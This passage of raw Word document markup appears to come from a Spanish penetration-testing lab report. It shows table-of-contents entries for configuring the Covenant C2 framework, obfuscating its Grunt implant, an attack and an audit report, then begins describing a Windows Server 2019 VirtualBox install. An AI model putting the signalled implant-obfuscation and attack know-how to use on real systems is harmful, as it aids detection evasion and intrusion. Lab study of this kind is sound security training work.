              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38EFAF9C" w14:textId="79D9EB64" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575997" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.I+D+I Covenenant:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575997 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>242</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E30BA7A" w14:textId="786BF15E" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575998" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Configuración:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575998 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>242</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E6ECD1D" w14:textId="68A17D95" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575999" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Uso:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575999 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>248</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BBF8F80" w14:textId="72A2BACC" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135576000" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ofuscado de Grunt:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135576000 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>263</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EF103A9" w14:textId="619A0FD6" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135576001" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ataque:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135576001 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>276</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F261BEC" w14:textId="75BF0D67" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135576002" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.Informe de auditoria</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135576002 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>319</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="040A090D" w14:textId="799EACEE" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135576003" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>a)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Informe ejecutivo:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135576003 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>319</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1009E2CF" w14:textId="52B4B7A0" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135576004" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>b)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Informe técnico:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135576004 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>322</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E954900" w14:textId="664EE3AF" w:rsidR="00D25CEE" w:rsidRDefault="00D25CEE">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="4FD00656" w14:textId="77777777" w:rsidR="00D25CEE" w:rsidRDefault="00D25CEE"/>
    <w:p w14:paraId="7285D072" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="50ED5A49" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="7FFCAAAA" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="63F9BD0C" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="097830EE" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="4A920FD5" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="15E0ADC9" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="3110BDB1" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="3C5C7698" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="49AFCDA8" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="17E3E01F" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="2D51F0B2" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="1F260586" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="0616B632" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="620E5DB1" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="0D98E140" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="7266BB35" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="4306050E" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="48F256FC" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F"/>
    <w:p w14:paraId="0C7AF56A" w14:textId="7649C065" w:rsidR="00D25CEE" w:rsidRDefault="00507D29" w:rsidP="00C6028D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc135575958"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00D25CEE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t>Instalación del contorno</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1069E4CC" w14:textId="77777777" w:rsidR="00C6028D" w:rsidRPr="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00C6028D">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="1" w:name="_Toc135575959" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:id w:val="1660650702"/>
        <w:placeholder>
          <w:docPart w:val="B9E64288D8DA49EBB8FF4E4861C60961"/>
        </w:placeholder>
        <w15:appearance w15:val="hidden"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="21DE3800" w14:textId="77777777" w:rsidR="00C6028D" w:rsidRPr="00D25CEE" w:rsidRDefault="00C6028D" w:rsidP="00C6028D">
          <w:pPr>
            <w:pStyle w:val="Ttulo2"/>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>Windows server 2019 v1809 Build 17763.737</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkEnd w:id="1" w:displacedByCustomXml="prev"/>
    <w:p w14:paraId="65171BBC" w14:textId="77777777" w:rsidR="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00C6028D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="428FDCEE" w14:textId="04D4280F" w:rsidR="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00C6028D">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Ahora procederé con la i</w:t>
      </w:r>
      <w:r w:rsidR="008248B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>ns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>talación de la má</w:t>
      </w:r>
      <w:r w:rsidR="008248B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>uina virutal de windows server 2019:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B63F0" w14:textId="77777777" w:rsidR="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00C6028D">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D5C0FC" w14:textId="5A117F32" w:rsidR="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00C6028D">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Primero mostraré la configuración de la má</w:t>
      </w:r>
      <w:r w:rsidR="008248B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>uina de VirtualBox:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28595260" w14:textId="77777777" w:rsidR="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00C6028D">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B9E3A7" w14:textId="18096209" w:rsidR="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00C6028D">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="475F28AD" w14:textId="77777777" w:rsidR="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00C6028D">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4538749B" w14:textId="77777777" w:rsidR="00C6028D" w:rsidRPr="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00C6028D">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55086A64" w14:textId="77777777" w:rsidR="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00C6028D">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3530E7EA" w14:textId="77777777" w:rsidR="00C6028D" w:rsidRPr="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00C6028D">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10426" w:type="dxa"/>
        <w:tblInd w:w="40" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10426"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D25CEE" w14:paraId="649DBF84" w14:textId="77777777" w:rsidTr="00994D80">
        <w:trPr>
          <w:trHeight w:val="3546"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10426" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72F99CBA" w14:textId="3F197496" w:rsidR="00D25CEE" w:rsidRDefault="00D25CEE" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A1B3585" wp14:editId="392306D0">
                  <wp:extent cx="6523809" cy="5038095"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1808717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17400" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId9">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6523809" cy="5038095"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B48080E" w14:textId="77777777" w:rsidR="00D25CEE" w:rsidRDefault="00D25CEE" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C985E76" w14:textId="77777777" w:rsidR="00D25CEE" w:rsidRDefault="00D25CEE" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48DB3C6A" w14:textId="77777777" w:rsidR="00D25CEE" w:rsidRDefault="00D25CEE" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61C19CD0" wp14:editId="5BA9CDB9">
                  <wp:extent cx="5400040" cy="4170680"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="72173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4366"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p>
          <w:p w14:paraId="43D5E5A0" w14:textId="77777777" w:rsidR="002D48C8" w:rsidRDefault="002D48C8" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="039FE550" w14:textId="0581E2B2" w:rsidR="002D48C8" w:rsidRDefault="002D48C8" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Ahora procedere con la isntalación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="273AB451" w14:textId="77777777" w:rsidR="002D48C8" w:rsidRDefault="002D48C8" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
